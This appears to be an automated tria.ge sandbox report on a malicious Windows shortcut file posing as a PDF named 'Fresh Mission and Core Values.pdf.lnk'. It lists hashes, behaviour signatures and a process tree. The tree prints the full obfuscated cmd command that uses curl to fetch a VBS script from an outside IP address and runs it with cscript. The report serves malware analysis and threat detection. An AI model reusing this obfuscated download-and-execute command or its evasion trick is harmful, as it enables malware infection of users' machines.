Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12/10/2023, 04:27
Static task
static1
Behavioral task
behavioral1
Sample
Fresh Mission and Core Values.pdf.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Fresh Mission and Core Values.pdf.lnk
Resource
win10v2004-20230915-en
General
-
Target
Fresh Mission and Core Values.pdf.lnk
-
Size
2KB
-
MD5
cea0885964c5c18fd7410ca82e0da52e
-
SHA1
272151f1e4f39fd79457dc3f1538103f153c5bf8
-
SHA256
e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e
-
SHA512
3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 48 100 cscript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation cscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1436 PING.EXE 3400 PING.EXE -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 48 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1672 wrote to memory of 3820 1672 cmd.exe 86 PID 1672 wrote to memory of 3820 1672 cmd.exe 86 PID 3820 wrote to memory of 1436 3820 cmd.exe 87 PID 3820 wrote to memory of 1436 3820 cmd.exe 87 PID 3820 wrote to memory of 3444 3820 cmd.exe 90 PID 3820 wrote to memory of 3444 3820 cmd.exe 90 PID 3820 wrote to memory of 3400 3820 cmd.exe 92 PID 3820 wrote to memory of 3400 3820 cmd.exe 92 PID 3820 wrote to memory of 100 3820 cmd.exe 95 PID 3820 wrote to memory of 100 3820 cmd.exe 95 PID 100 wrote to memory of 4516 100 cscript.exe 98 PID 100 wrote to memory of 4516 100 cscript.exe 98
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit2⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\PING.EXEp"in"G kdYh3⤵
- Runs ping.exe
PID:1436
-
-
C:\Windows\system32\curl.execU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs3⤵PID:3444
-
-
C:\Windows\system32\PING.EXEp"in"G -n 3 kdYh3⤵
- Runs ping.exe
PID:3400
-
-
C:\Windows\system32\cscript.exeC"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"4⤵PID:4516
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c4a8d81a73bc508196aced6725f854a3
SHA1d9970f285539d2f55df5dfba815042d37f16a78e
SHA256a8f83ce806fe76f2ec67479eadb5985125d274e1fe9bb8dce943360414da9fc0
SHA512dd7e3a7b2a301b58ff9615bdeaf3606929a06979bbaba25c7914d565abdef6410ca78665df788783ee2c2a2f083962fc8bc09337a5fd584091eb83131722a641